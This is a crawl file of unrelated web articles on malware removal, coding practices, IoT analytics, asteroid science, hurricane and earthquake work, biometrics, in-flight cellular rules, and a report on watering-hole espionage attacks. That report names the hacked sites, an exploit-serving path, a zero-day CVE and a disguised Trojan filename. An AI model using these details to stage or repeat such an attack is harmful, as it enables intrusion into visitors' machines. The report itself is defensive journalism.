Once the program has been downloaded, double-click on the Unhide.exe icon on your desktop and allow the program to run. This program will remove the +H, or hidden, attribute from all the files on your hard drives. If there are any files that were purposely hidden by you, you will need to hide them again after this tool is run.
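For readers curious about what "unhiding" actually involves, the following is only a conceptual Python sketch of the same idea (clearing the hidden attribute through the Win32 API). It is not the Unhide.exe tool itself, the example path is hypothetical, and using the tool above is the supported approach:

    import ctypes
    import os

    FILE_ATTRIBUTE_HIDDEN = 0x2
    INVALID_FILE_ATTRIBUTES = 0xFFFFFFFF
    kernel32 = ctypes.windll.kernel32

    def unhide_tree(root):
        """Clear the hidden attribute on every file under root (Windows only)."""
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                attrs = kernel32.GetFileAttributesW(path)
                if attrs != INVALID_FILE_ATTRIBUTES and attrs & FILE_ATTRIBUTE_HIDDEN:
                    # Clear only the hidden bit; leave other attributes untouched.
                    kernel32.SetFileAttributesW(path, attrs & ~FILE_ATTRIBUTE_HIDDEN)

    # Example (hypothetical path): unhide_tree("C:\\Users\\YourName\\Documents")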
- Finally, as many rogues and other malware are installed through vulnerabilities found in out-dated and insecure programs, it is strongly suggested that you use Secunia PSI to scan for vulnerable programs on your computer. A tutorial on how to use Secunia PSI to scan for vulnerable programs can be found here:
How to detect vulnerable and out-dated programs using Secunia Personal Software Inspector
Your computer should now be free of the Windows Recovery program. If your current anti-virus solution let this infection through, you may want to consider purchasing the PRO version of Malwarebytes Anti-Malware to protect against these types of threats in the future.
Our deployable solutions in predictive care have accelerated the development of genomics platforms and advanced precision medicine. The term “genomics” encompasses technologies from sequencing an individual’s DNA to using informatics for data management, security and analysis. Our expertise in precision medicine centers on security, cloud computing, integration of genomic and clinical data, interoperability, and researcher tools to access genomic data.
There’s a need to scale the science of studying genomics and relate aspects of individual genetic variations to disease and health. Advancements in precision medicine will revolutionize outcomes in healthcare for all involved. Some possibilities include:
- Precision oncology will treat tumors based on genetic abnormalities that drive the cancer
- Pharmacogenomics will advance our understanding of how genetic variations affect a patient’s response to medications
- Rare disease diagnosis will find and identify new mutations with whole genome scans
- Pre-disposition scans will find diseases through gene abnormalities before they strike
- Risk-adjusted screening will reduce unnecessary tests based on your genetic risk
Learn how precision medicine is advancing disease treatment & prevention.
What is precision medicine and why is it important to the future of healthcare?
Find answers through our precision medicine infographic. | <urn:uuid:54ba2a4d-326d-431d-949b-21db2ecfff64> | CC-MAIN-2017-09 | https://www.leidos.com/health/precision-medicine?host=h | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00167-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.855319 | 260 | 2.71875 | 3 |
The Pareto principle states that 80 percent of outcomes can be attributed to 20 percent of the possible causes of a given event. Also known as the 80-20 rule, it's relevant to almost every field of human endeavor.
In the field of software development, the principle can be summarized by saying that most problems are caused by a small number of bad coding practices. Eliminate them and your work will be very much easier and more productive.
These 10 coding practices are the worst culprits.
1. Typos in Your Code
These are surprisingly common, and they are maddening because they have nothing to do with your programming skill. Even so, a misspelled variable name or function name can wreak havoc on your code. What's more, they may not be easy to spot.
What's the solution? Working in a good integrated development environment (IDE) or even a programmer-specific text editor can reduce spelling errors significantly. Another thing you can do: Deliberately choose variable and function names that are easy to spell and, therefore, easy to spot when they have been misspelled. Avoid words such as receive, which can easily be misspelled as recieve without being obvious.
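A tiny, hypothetical Python example shows why such typos are so hard to spot: the misspelled name silently becomes a brand-new variable, and the code still runs.

    def total_received(payments):
        received = 0
        for payment in payments:
            recieved = received + payment  # typo: creates a new variable, so the total never updates
        return received

    print(total_received([10, 20, 30]))  # prints 0, not 60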
2. Failing to Indent or Format Your Code
Indenting and otherwise formatting your code makes it easier to understand at a glance and, therefore, to spot mistakes. It also makes it far easier for other people to maintain your code, as it's presented in a consistent fashion.
If you use an IDE that doesn't automatically format your code, consider running it through a code beautifier such as Uncrustify, which will format it consistently according to the rules you configure.
3. Failing to Modularize Your Code
It's good coding practice to write functions that do one thing and one thing only. That helps keep them short and, therefore, easy to understand and maintain. Long functions have many possible paths through them, making them much harder to test.
A good rule of thumb: One function should occupy no more space than a single screen. Another one: If it has 10 or more "if" statements or loops, then it's too complicated and should be rewritten.
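As a rough illustration of the idea (a hedged sketch, not a prescription), a reporting routine might be split so that each function does exactly one job and the top-level function is just composition:

    def load_records(path):
        """Read comma-separated records from a text file."""
        with open(path) as handle:
            return [line.strip().split(",") for line in handle if line.strip()]

    def validate_records(records):
        """Keep only rows with three fields and a numeric amount."""
        return [row for row in records if len(row) == 3 and row[2].isdigit()]

    def total_amount(records):
        return sum(int(row[2]) for row in records)

    def report(path):
        # Short, single-purpose functions are easy to read, test, and reuse.
        return total_amount(validate_records(load_records(path)))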
4. Letting Your IDE Lull You Into a False Sense of Security
IDEs and other tools that provide code completion are fantastic for productivity. They suggest variables and other things based on what is in scope, given what you have already typed. But there's a danger with this type of tool - you can pick something because it looks like what you expect without taking the necessary effort to ensure that it's exactly what you want. Essentially, the tool does the thinking for you, when you in fact are responsible for making sure that the thinking is right.
There's a fine line to be drawn, though. Code completion tools can help eliminate errors such as typos and increase productivity, but they can also introduce "code completion" errors if you don't stay on the ball.
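A hypothetical example of the trap: two similarly named attributes are both in scope, and accepting the wrong completion still produces code that runs without complaint.

    class Invoice:
        def __init__(self, amount_due, amount_paid):
            self.amount_due = amount_due
            self.amount_paid = amount_paid

    def outstanding_balance(invoice):
        # Intended: amount_due minus amount_paid. Picking the look-alike
        # completion still runs, but silently returns the wrong figure.
        return invoice.amount_due - invoice.amount_due  # should be invoice.amount_paid

    print(outstanding_balance(Invoice(100, 40)))  # prints 0, not 60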
5. Hard-Coding Passwords
It's tempting to hard-code a secret account and password so you can get into your system later. You know you shouldn't do this - yes, it's highly convenient, but it's also highly convenient for anyone who gets access to the source code.
The real problem is that a hardcoded password will eventually become more widely known than you had intended. That makes it a huge security risk, not to mention a highly inconvenient fix.
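One common alternative, sketched below in Python with a made-up variable name, is to keep the credential out of the source entirely and read it from the environment (or a secrets manager) at run time:

    import os

    # Bad: anyone with the source, or the repository history, has the credential.
    # ADMIN_PASSWORD = "s3cr3t-backdoor"

    # Better: the credential lives outside the code and can be rotated independently.
    ADMIN_PASSWORD = os.environ.get("ADMIN_PASSWORD")
    if ADMIN_PASSWORD is None:
        raise RuntimeError("ADMIN_PASSWORD environment variable is not set")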
6. Failing to Use Good Encryption to Protect Data
Sensitive data needs to be encrypted as it travels over the network, because it's vulnerable to interception when it does so. It's not just a good idea; it's a regulatory requirement, if not the law.
That means sending data in the clear is a "no no." It also rules out using your own encryption or obfuscation scheme. Writing your own secure encryption system is hard - just look at what happened with WEP - so use a proven industry standard encryption library and use it correctly.
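As one possible illustration (assuming the third-party cryptography package is installed; in practice, data in transit is usually protected with TLS rather than hand-rolled calls), using a vetted library takes only a few lines:

    from cryptography.fernet import Fernet

    key = Fernet.generate_key()   # real systems need careful key management
    cipher = Fernet(key)

    token = cipher.encrypt(b"account=12345;balance=99.10")
    print(cipher.decrypt(token))  # the original bytes are recovered only with the key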
7. Optimizing Code Prematurely
Legendary programmer Donald Knuth once said, "Programmers waste enormous amounts of time thinking about, or worrying about, the speed of noncritical parts of their programs, and these attempts at efficiency actually have a strong negative impact when debugging and maintenance are considered."
Being clever with your code may make it run infinitesimally faster, but it makes it far harder to debug and maintain. A better strategy: Write your code clearly, then go to work on any parts that really need optimizing in order to improve performance.
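A simple way to find the parts that really need optimizing is to measure first; for example, Python's standard-library profiler shows where the time actually goes before you touch anything:

    import cProfile

    def heavy_calculation():
        return sum(i * i for i in range(100_000))

    def light_formatting():
        return [name.upper() for name in ("alpha", "beta", "gamma")]

    def main():
        heavy_calculation()
        light_formatting()

    cProfile.run("main()", sort="cumulative")  # optimize only what shows up as hot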
8. Failing to Think Ahead
What's your project for, how much will it be expected to scale, how many users will it have and how fast must it run? The answers to these questions may not be available - but if you fail to make estimates, then how can you choose a suitable framework for developing the application that will be able to meet these requirements?
Twitter provides a good example of the problems you encounter if you underestimate future requirements. Twitter had to abandon Ruby on Rails and rewrite much of its code using Scala and other technologies because the Ruby code, as originally architected, simply couldn't scale to keep up with Twitter's fast-growing user base.
9. Adding People to Make Up for Lost Time
Almost every software project falls behind schedule. Adding people to the project to get it back on track sounds like a good idea in theory, but it's a common mistake. In fact, adding new people to a project almost always results in a drop in overall productivity.
10. Using Known Bad Time Estimates
At the same time, it's important to avoid the temptation to imagine that you'll catch up with your schedule later without adding people to the project. If you fall behind schedule, it's because your time estimates were wrong. That means you need to make a new estimate of the length of the project, not blindly stick to an estimate that has already been proven wrong.
This story, "10 Bad Coding Practices That Wreck Software Development Projects" was originally published by CIO. | <urn:uuid:190446ac-25b7-4a32-a8ce-f8a6e9180ce1> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2369322/software/10-bad-coding-practices-that-wreck-software-development-projects.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00043-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.945867 | 1,276 | 3.171875 | 3 |
Joseph Schumpeter, one of my favorite economists, coined the term "creative destruction" to describe the way in which innovation disrupts how things are done, and in the process, gives rise to new companies and new ways of operating. What's been called the Internet of Things -- the rapidly proliferating connection of all devices, sensors, machines and people -- is set to create disruption on a huge scale. This ups the ante significantly for analytics and real-time computing.
The driverless car is an excellent example of a disruptive innovation that impacts both consumers and businesses. For instance, when driverless cars become common, not only will they change commuters' experiences, they are also expected to lessen the incidence of traffic accidents, improve the density of road use, smooth subsequent planning for maintenance, ease long-term planning for other transportation systems such as light rail, and much more. What makes all of this possible? The Internet of Things' flow of data between the cars, street lights, people, radios, cellphones and so on, and the real-time analytics that make the important real-time decisions for the driverless cars.
It is only human nature. Once consumers and businesses have a taste of the Internet of Things and real-time analytics benefits, they'll want more of it. In fact, it has been said that along with the influx of data, by 2017 more than 50 percent of analytics implementations will make use of event data streams generated from instrumented machines, applications, and/or individuals. How can companies keep up with this real-time analytics demand? By changing how analytics is currently done to fit the new digital need, including:
- Analytics of vast amounts of data will increasingly be performed in the cloud or on devices themselves.
- New ways of distributing analytics will be used. Currently, a lot of analytics applications are large and run on servers. In the next few years we'll start seeing more and more limited and targeted "apps" running on small sensors embedded in devices. These will have to be updated remotely, as it will be too expensive to distribute the analytics any other way.
- The analytics conducted on servers and laptops today will start being performed on sensors and chips, which will allow decisions to be made far from where the code was originally written. For example, the personal devices that monitor and analyze individuals' health or the success - or otherwise - of their workout offer real time, minute-to-minute performance insights and suggestions, telling their wearer how to achieve the fitness goals they've set. We'll increasingly see those immediate insights and recommendations extended to many more areas of life and business.
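As a minimal sketch of the kind of lightweight, on-device analytics described in the last point above (the thresholds and readings are made up), a sensor can keep a rolling baseline and raise an alert locally instead of shipping every raw reading to a server:

    from collections import deque

    window = deque(maxlen=20)  # recent readings kept on the device

    def ingest(reading, threshold=5.0):
        """Return an alert string if the reading deviates from the rolling baseline."""
        window.append(reading)
        baseline = sum(window) / len(window)
        if abs(reading - baseline) > threshold:
            return "alert: reading %.1f deviates from baseline %.1f" % (reading, baseline)
        return None

    for value in [21.0, 21.2, 20.9, 35.0, 21.1]:
        message = ingest(value)
        if message:
            print(message)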
It is important to note that for businesses to jump into the Internet of Things and truly take advantage of the real-time analytics benefits it can offer, they must look beyond their existing data and analytics and adopt a larger strategy to enable success. Elements of that strategy should include test-and-learn pilots, a data governance program, and a technology infrastructure that supports mobile and big data.
If you think that the world of driverless cars, robots carrying out maintenance in hazardous locations like oilrigs, or advertising that reads and responds to individuals' unique facial expressions sound like science fiction, it's time to think again. These are all developments happening today and they're prompting a new exciting phase in analytics that needs to be addressed now. Those that embrace the data will be more likely to be surfing on top of the wave of creative destruction, instead of having it crash down on top of them. | <urn:uuid:1dcad73b-85cf-4573-a8bc-73b5b9659714> | CC-MAIN-2017-09 | http://www.computerworld.com/article/2475818/business-intelligence/the-internet-of-things-and-real-time-analytics.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00219-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951502 | 709 | 2.671875 | 3 |
Professor of Economics
Lincoln University, New Zealand
Social Scientist, GNS Science and Director of the Joint Centre for Disaster Research
Massey University, New Zealand
Dr. Thomas Pratt
US Geological Survey, Department of the Interior
Canterbury Department of Emergency Management
Earthquakes in the central and eastern U.S. are rare (low probability) events, but the M5.8 Virginia earthquake in 2011 reminded us that earthquakes can and will occur where least expected. Every earthquake has some consequences, and fortunately the Virginia event was centered far away from any urbanized areas where it could have caused significant damage and injuries. This was not the case for the Canterbury region of New Zealand. The low probability earthquakes that struck in 2010 and 2011 had dire consequences: the M5.5 to M6.3 earthquakes destroyed most of the urban center of Christchurch, caused losses totaling 20% of New Zealand's GDP, killed 185 people and injured over 6,000.
This session spotlights the lessons learned in New Zealand. Experts from there who have both personal and professional roles contending with the immediate and long-term consequences of the Canterbury earthquakes will share their real-life experiences. Session discussion will put these lessons into a U.S. context, touching on what could happen if an earthquake like Virginia's occurred closer to an unsuspecting central or eastern U.S. city and how we might become more resilient physically and economically, not just to the hazards posed by local earthquakes, but also to those posed by earthquakes worldwide.
- What worked and didn’t work during the response and recovery phases of a major disaster in an environment very similar to that in many moderate-sized US cities,
- What nature can deliver and the potential impacts in a typical, long-lived earthquake sequence,
- Earthquake hazard forecasts regionally and globally. | <urn:uuid:2b0bd57c-bed7-49bb-9e59-851fa40a17d9> | CC-MAIN-2017-09 | https://govsecinfo.com/events/govsec-2014/sessions/wednesday/slp2-3.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00219-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.948683 | 369 | 2.78125 | 3 |
Durech J.,Charles University |
Kaasalainen M.,Tampere University of Technology |
Herald D.,International Occultation Timing Association IOTA |
Dunham D.,KinetX, Inc |
And 8 more authors.
Icarus | Year: 2011
Asteroid sizes can be directly measured by observing occultations of stars by asteroids. When there are enough observations across the path of the shadow, the asteroid's projected silhouette can be reconstructed. Asteroid shape models derived from photometry by the lightcurve inversion method enable us to predict the orientation of an asteroid for the time of occultation. By scaling the shape model to fit the occultation chords, we can determine the asteroid size with a relative accuracy of typically ∼10%. We combine shape and spin state models of 44 asteroids (14 of them are new or updated models) with the available occultation data to derive asteroid effective diameters. In many cases, occultations allow us to reject one of two possible pole solutions that were derived from photometry. We show that by combining results obtained from lightcurve inversion with occultation timings, we can obtain unique physical models of asteroids. © 2011 Elsevier Inc. Source
Tanga P.,French National Center for Scientific Research |
Carry B.,French National Center for Scientific Research |
Colas F.,French National Center for Scientific Research |
Delbo M.,French National Center for Scientific Research |
And 39 more authors.
Monthly Notices of the Royal Astronomical Society | Year: 2015
Asteroid (234) Barbara is the prototype of a category of asteroids that has been shown to be extremely rich in refractory inclusions, the oldest material ever found in the Solar system. It exhibits several peculiar features, most notably its polarimetric behaviour. In recent years other objects sharing the same property (collectively known as 'Barbarians') have been discovered. Interferometric observations in the mid-infrared with the ESO VLTI (Very Large Telescope Interferometer) suggested that (234) Barbara might have a bi-lobated shape or even a large companion satellite. We use a large set of 57 optical light curves acquired between 1979 and 2014, together with the timings of two stellar occultations in 2009, to determine the rotation period, spin-vector coordinates, and 3-D shape of (234) Barbara, using two different shape reconstruction algorithms. By using the light curves combined to the results obtained from stellar occultations, we are able to show that the shape of (234) Barbara exhibits large concave areas. Possible links of the shape to the polarimetric properties and the object evolution are discussed. We also show that VLTI data can be modelled without the presence of a satellite. © 2015 The Author Published by Oxford University Press on behalf of the Royal Astronomical Society. Source
Dunham D.W.,International Occultation Timing Association IOTA |
Herald D.,IOTA |
Timerson B.,IOTA |
Maley P.,IOTA |
And 4 more authors.
Proceedings of the International Astronomical Union | Year: 2016
For 40 years, the sizes and shapes of many dozens of asteroids have been determined from observations of asteroidal occultations, and over a thousand high-precision positions of the asteroids relative to stars have been measured. Some of the first evidence for satellites of asteroids was obtained from the early efforts; now, the orbits and sizes of some satellites discovered by other means have been refined from occultation observations. Also, several close binary stars have been discovered, and the angular diameters of some stars have been measured from analysis of these observations. The International Occultation Timing Association (IOTA) coordinates this activity worldwide, from predicting and publicizing the events, to accurately timing the occultations from as many stations as possible, and publishing and archiving the observations. Copyright © 2016 International Astronomical Union. Source
Braga-Ribas F.,Observatorio Nacional |
Sicardy B.,Observatoire de Paris |
Sicardy B.,University Pierre and Marie Curie |
Ortiz J.L.,Institute Astrofisica Of Andalucia Csic |
And 52 more authors.
Astrophysical Journal | Year: 2013
We present results derived from the first multi-chord stellar occultations by the transneptunian object (50000) Quaoar, observed on 2011 May 4 and 2012 February 17, and from a single-chord occultation observed on 2012 October 15. If the timing of the five chords obtained in 2011 were correct, then Quaoar would possess topographic features (crater or mountain) that would be too large for a body of this mass. An alternative model consists in applying time shifts to some chords to account for possible timing errors. Satisfactory elliptical fits to the chords are then possible, yielding an equivalent radius Requiv = 555 ± 2.5 km and geometric visual albedo pV = 0.109 ± 0.007. Assuming that Quaoar is a Maclaurin spheroid with an indeterminate polar aspect angle, we derive a true oblateness of , an equatorial radius of km, and a density of 1.99 ± 0.46 g cm-3. The orientation of our preferred solution in the plane of the sky implies that Quaoar's satellite Weywot cannot have an equatorial orbit. Finally, we detect no global atmosphere around Quaoar, considering a pressure upper limit of about 20 nbar for a pure methane atmosphere. © 2013. The American Astronomical Society. All rights reserved. Source
Sicardy B.,University of Paris Descartes |
Sicardy B.,University Pierre and Marie Curie |
Sicardy B.,Institut Universitaire de France |
Bolt G.,Craigie |
And 32 more authors.
Astronomical Journal | Year: 2011
Pluto and its main satellite, Charon, occulted the same star on 2008 June 22. This event was observed from Australia and La Réunion Island, providing the east and north Charon Plutocentric offset in the sky plane (J2000): X = + 12,070.5 ± 4 km (+ 546.2 ± 0.2 mas), Y = + 4,576.3 ± 24 km (+ 207.1 ± 1.1 mas) at 19:20:33.82 UT on Earth, corresponding to JD 2454640.129964 at Pluto. This yields Charon's true longitude L = 153.483 ± 0. ° 071 in the satellite orbital plane (counted from the ascending node on J2000 mean equator) and orbital radius r = 19,564 ± 14 km at that time. We compare this position to that predicted by (1) the orbital solution of Tholen & Buie (the "TB97" solution), (2) the PLU017 Charon ephemeris, and (3) the solution of Tholen et al. (the "T08" solution). We conclude that (1) our result rules out solution TB97, (2) our position agrees with PLU017, with differences of δL = + 0.073 ± 0. ? 071 in longitude, and δr = + 0.6 ± 14 km in radius, and (3) while the difference with the T08 ephemeris amounts to only δL = 0.033 ± 0. ? 071 in longitude, it exhibits a significant radial discrepancy of δr = 61.3 ± 14 km. We discuss this difference in terms of a possible image scale relative error of 3.35 × 10-3in the 2002-2003 Hubble Space Telescope images upon which the T08 solution is mostly based. Rescaling the T08 Charon semi-major axis, a = 19, 570.45 km, to the TB97 value, a=19636 km, all other orbital elements remaining the same ("T08/TB97" solution), we reconcile our position with the re-scaled solution by better than 12 km (or 0.55 mas) for Charon's position in its orbital plane, thus making T08/TB97 our preferred solution. © 2011. The American Astronomical Society. All rights reserved. Source | <urn:uuid:06a6fd2d-4ba2-468e-978d-38ef99450c5c> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/euraster-450509/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00219-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.867678 | 1,742 | 2.890625 | 3 |
In recognition of National Hurricane Preparedness Week, the USGS has initiated specific actions to prepare for the impending hurricane season that runs June through October.
One specific action is the use of geoaddressing. When Hurricane Katrina left New Orleans under water, conventional road maps became almost useless tools to locate those in distress. "Geoaddressing," using GPS, satellite, and other remotely obtained geospatial information, proved crucial for search and rescue operations. The USGS has established a Geospatial Information Response Team (GIRT) whose purpose is to ensure streamlined and responsive coordination and timely availability of geospatial information for effective Gulf and East coast storm response for emergency responders, land and resource managers, and scientific analysis. The GIRT is responsible for putting in place and monitoring procedures for geospatial data acquisition, processing, and archiving; data discovery, access, and delivery; anticipating geospatial needs; and other related geospatial products and services. During national emergencies, the USGS Geospatial Information Response Team provides post-event airborne imagery within 24 hours upon request of the Federal Emergency Management Agency (FEMA).
Scientific research at the USGS related to hurricanes includes: 1) radar-tracking of migratory birds during the fall migration period to assess possible effects of hurricanes on migration patterns; 2) studying global climate change and effects of sea-level rise on coastal wetlands and forests; 3) predicting the persistence of coastal wetlands to global climate change effects, including effects of altered temperature and atmospheric carbon dioxide; 4) biogenic accretion through surface-root production in coastal wetlands and implications for elevation change relative to sea-level rise; 5) tracking and visualization of coastal restoration projects; 6) hurricane modeling including models of spread of invasive species via hurricane-force winds.
Researchers twist light to send data at 2.56 terabits/sec
- By Henry Kenyon
- Jun 26, 2012
Researchers have developed a light-based method to transmit data at rates up to 2.56 terabits/sec. The new approach opens the possibility of high-speed satellite communications, short-range free-space terrestrial links, and potential adaptation in fiber-optic systems.
Developed by a multinational team of scientists led by the University of Southern California, the process uses eight beams of light twisted into a DNA-like helical stream through the use of light-bending “phase holograms.”
Each individual beam has its own twist, which can be encoded with data to effectively serve as an independent data stream, similar to individual channels on a radio, USC scientists said in a statement.
Broadband cable has a maximum data rate of 30 megabits/sec. The twisted light system is capable of moving more than 85,000 times more data, USC officials said.
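To get a rough feel for why multiplexing twisted beams scales so quickly, here is a small, purely illustrative Python sketch, not the USC team's actual signal processing. It builds the helical phase profile a "phase hologram" would impose for a given twist number and tallies the aggregate throughput of eight independently encoded beams; the per-beam rate, mode numbers and grid size are assumptions chosen only to line up with the figures quoted above.

```python
import numpy as np

# Illustrative assumptions: 8 twisted modes, each carrying ~320 Gbit/s,
# which adds up to roughly the 2.56 terabit/sec aggregate reported.
PER_BEAM_GBPS = 320
MODES = [-4, -3, -2, -1, 1, 2, 3, 4]       # hypothetical twist numbers (l)

def helical_phase(l, size=256):
    """Phase ramp exp(i*l*phi) that a hologram imposes to twist a beam."""
    y, x = np.mgrid[-1:1:size * 1j, -1:1:size * 1j]
    phi = np.arctan2(y, x)                 # azimuthal angle at each pixel
    return np.angle(np.exp(1j * l * phi))  # wrapped phase in [-pi, pi]

hologram = helical_phase(MODES[0])         # one mode's light-bending pattern

total_gbps = PER_BEAM_GBPS * len(MODES)
print(f"{len(MODES)} beams x {PER_BEAM_GBPS} Gbit/s = {total_gbps} Gbit/s")
print(f"vs. 30 Mbit/s cable: about {total_gbps * 1000 / 30:,.0f} times more")
```

Each mode's phase ramp is orthogonal to the others, which is what lets every beam behave as an independent channel on the same physical path.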
“You’re able to do things with light that you can’t do with electricity,” said Alan Willner, a professor of electrical engineering at USC’s Viterbi School of Engineering. Willner is also the author of a related article about the research published in Nature Photonics on June 24. He said the USC team did not invent the beam twisting process, but it did ramp it up to terabit levels. “That’s the beauty of light; it’s a bunch of photons that can be manipulated in many different ways at very high speed,” he added.
The technology, the result of research funded by the Defense Advanced Research Projects Agency as part of its Information in a Photon, or InPho, program, was successfully demonstrated in a laboratory setting that simulated satellite communications in space.
The research team included members from the United States, China, Pakistan and Israel.
This article appeared in Ed Tech magazine.
As more colleges shift to online courses and exams, the potential for cheating grows. But new technology is on the rise that authenticates students' identities with something that can’t be shared — their bodies.
Colleges are using biometric authentication to leap past the days of PINs and passwords.
With the inclusion of a fingerprint scanner on the Apple iPhone 5S in 2013 and Samsung’s Galaxy S5 in 2014, a key biometric technology has already gone mainstream. Using this and other unique body identifiers for authentication, biometrics can be implemented in a variety of ways to change or augment security measures.
Biometric Signature ID, a Lewisville, Texas, company, has found some success in higher education through its eponymous handwriting and gesture-based security program.
BioSig-ID builds a profile for each student based on how they write, sign or gesture using a pen or mouse. This profile is used for comparison when the student takes an online test.
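BioSig-ID's actual matching algorithm is proprietary, so the sketch below is only a generic illustration of the idea: comparing an enrolled gesture profile against a fresh attempt using a simple dynamic-time-warping distance over (x, y) pen or mouse samples. The traces and the acceptance threshold are made-up values.

```python
import numpy as np

def dtw_distance(a, b):
    """Dynamic-time-warping distance between two 2-D stroke traces."""
    n, m = len(a), len(b)
    cost = np.full((n + 1, m + 1), np.inf)
    cost[0, 0] = 0.0
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            d = np.linalg.norm(a[i - 1] - b[j - 1])     # point-to-point distance
            cost[i, j] = d + min(cost[i - 1, j],        # skip a point in b
                                 cost[i, j - 1],        # skip a point in a
                                 cost[i - 1, j - 1])    # align the two points
    return cost[n, m]

# Hypothetical enrolled profile and a new sign-in attempt, as (x, y) samples.
enrolled = np.array([[0, 0], [1, 2], [2, 3], [4, 3], [5, 5]], dtype=float)
attempt = np.array([[0, 0], [1, 1], [2, 3], [4, 4], [5, 5]], dtype=float)

THRESHOLD = 3.0                    # made-up acceptance threshold
score = dtw_distance(enrolled, attempt)
print("accept" if score <= THRESHOLD else "re-verify", f"(distance={score:.2f})")
```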
Another authentication feature of the program asks students to memorize a sequence of clicks made on an image. In one example, an image of a kitchen had three apples. Students would click on each apple in a sequence. The image is then tilted and students would click on those same apples again at a different angle.
Security in use at Georgia Southern University takes a different approach to biometrics — one generally associated with private security systems and the military.
While waiting in line at the school’s dining halls, students forgo swiping the traditional plastic ID card, and instead look into an iris scanner for less than two seconds to confirm their identity. Implementing five such iris scanners at the university cost about $35,000, according to CR80 News, which covers campus identification and security technology.
The iris system has authenticated more than 375,000 transactions since being deployed in August 2013, CR80 News reports.
Mark Sarver, CEO of eduKan, a consortium of community colleges that offer online courses and degrees, says the group has been using biometric scanning to authenticate more than 10,000 students over the past three years. He told eCampus News that the technology has proved to be cost-effective and transparent to students.
The costs associated with certain biometric technologies can be a barrier to entry for some colleges, CR80 News reports. Faster iris scanners cost more, while slower models are cheaper. The technology adopted by Georgia Southern reads irises in under two seconds, which is slower than other models, but just fine for those waiting in line.
Though many biometric technologies, such as fingerprint scanners, have been around for decades, their usage has been growing as the components become more prevalent and affordable. The incorporation of these technologies in higher education environments is a result of their growing acceptance, bolstered by a movement in building security toward less invasive measures.
“People have been talking about this for decades as the future, but I think the technology is finally good enough and invisible enough that people will start to embrace it,” says Robert McCrie, a professor at John Jay College of Criminal Justice and the former director of the school’s Security Management Institute.
Security experts are accustomed to direct attacks, but some of today’s more insidious incursions succeed in a roundabout way — by planting malware at sites deemed most likely to be visited by the targets of interest. New research suggests these so-called “watering hole” tactics recently have been used as stepping stones to conduct espionage attacks against a host of targets across a variety of industries, including the defense, government, academia, financial services, healthcare and utilities sectors.
Some of the earliest details of this trend came in late July 2012 from RSA FirstWatch, which warned of an increasingly common attack technique involving the compromise of legitimate websites specific to a geographic area which the attacker believes will be visited by end users who belong to the organization they wish to penetrate.
At the time, RSA declined to individually name the Web sites used in the attack. But the company shifted course somewhat after researchers from Symantec this month published their own report on the trend (see The Elderwood Project). Taken together, the body of evidence supports multiple, strong connections between these recent watering hole attacks and the Aurora intrusions perpetrated in late 2009 against Google and a number of other high-profile targets.
In a report released today, RSA’s experts hint at — but don’t explicitly name — some of the watering hole sites. Rather, the report redacts the full URLs of the hacked sites that were redirecting to exploit sites in this campaign. However, through Google and its propensity to cache content, we can see firsthand the names of the sites that were compromised in this campaign.
According to RSA, one of the key watering hole sites was “a website of enthusiasts of a lesser known sport,” hxxp://xxxxxxxcurling.com. Later in the paper, RSA lists some of the individual pages at this mystery sporting domain that were involved in the attack (e.g., http://www.xxxxxxxcurling.com/Results/cx/magma/iframe.js). As it happens, running a search on any of these pages turns up a number of recent visitor logs for this site — torontocurling.com. Google cached several of the access logs from this site during the time of the compromise cited in RSA’s paper, and those logs help to fill in the blanks intentionally left by RSA’s research team, or more likely, the lawyers at RSA parent EMC Corp. (those access logs also contain interesting clues about potential victims of this attack as well).
From cached copies of dozens of torontocurling.com access logs, we can see the full URLs of some of the watering hole sites used in this campaign:
- http://rocklandtrust.com (Massachusetts Bank)
- http://ndi.org (National Democratic Institute)
- http://www.rferl.org (Radio Free Europe / Radio Liberty)
According to RSA, the sites in question were hacked between June and July 2012 and were silently redirecting visitors to exploit pages on torontocurling.com. Among the exploits served by the latter was a then-unpatched zero-day vulnerability in Microsoft Windows (XML Core Services/CVE-2012-1889). In that attack, the hacked sites foisted a Trojan horse program named “VPTray.exe” (made to disguise itself as an update from Symantec, which uses the same name for one of its program components).
The U.S. Federal Communications Commission will consider letting passengers use cellular services on airplanes, breaking with a ban that has been in place for years.
At a meeting set for Dec. 12, the FCC will consider a Notice of Proposed Rulemaking to allow passengers to use mobile wireless services "via onboard airborne access systems," according to an agenda for the meeting that was released Thursday.
Both the FCC and the U.S. Federal Aviation Administration have long restricted the use of both cellphones and other electronic devices in flight because of concerns about interference with navigation and other onboard electronics. The FAA recently eased regulations on using some electronic devices during takeoff and landing.
The FCC proposal would allow the use of mobile services that are now banned in flight. That would mean passengers could get online and potentially make voice calls over cellular services and not just the in-flight Wi-Fi provided on many flights today. They would access the cellular services via equipment on the plane rather than cellphone towers on the ground. Airlines could still restrict voice calls in flight, just as the major U.S. airlines now ban Internet voice calls via Wi-Fi.
"Today, we circulated a proposal to expand consumer access and choice for in-flight mobile broadband," FCC Chairman Tom Wheeler said in a statement. "Modern technologies can deliver mobile services in the air safely and reliably, and the time is right to review our outdated and restrictive rules. I look forward to working closely with my colleagues, the FAA, and the airline industry on this review of new mobile opportunities for consumers."
The plan wouldn't allow cellular use during takeoff and landing, but only above 10,000 feet, according to the FCC.
While the FAA has regulated electronics devices to protect aviation equipment, the FCC has banned the use of cellular radios in flight because they can harm cellular networks on the ground. If the FCC follows through with its plan, the FAA would still have to approve the small cellular base stations for installation on planes.
